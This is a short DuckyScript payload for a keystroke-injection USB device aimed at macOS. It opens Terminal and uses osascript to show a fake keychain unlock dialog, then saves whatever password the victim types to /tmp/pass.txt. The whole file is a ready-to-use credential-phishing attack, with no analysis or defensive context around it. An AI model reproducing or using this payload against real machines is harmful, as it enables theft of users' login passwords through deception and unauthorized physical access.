REM =====================================================
REM Title: Fake Keychain Password Prompt
REM Author: yogeshjoga
REM Target: macOS 10.15+
REM Category: Phishing
REM Description: Creates a fake keychain unlock prompt
REM =====================================================

DELAY 1000
GUI SPACE
DELAY 500
STRING terminal
DELAY 500
ENTER
DELAY 1000
STRING osascript -e 'tell application "System Events" to display dialog "System wants to use the login keychain. Please enter the login keychain password:" default answer "" with hidden answer' > /tmp/pass.txt 2>&1
ENTER
DELAY 500
STRING exit
ENTER
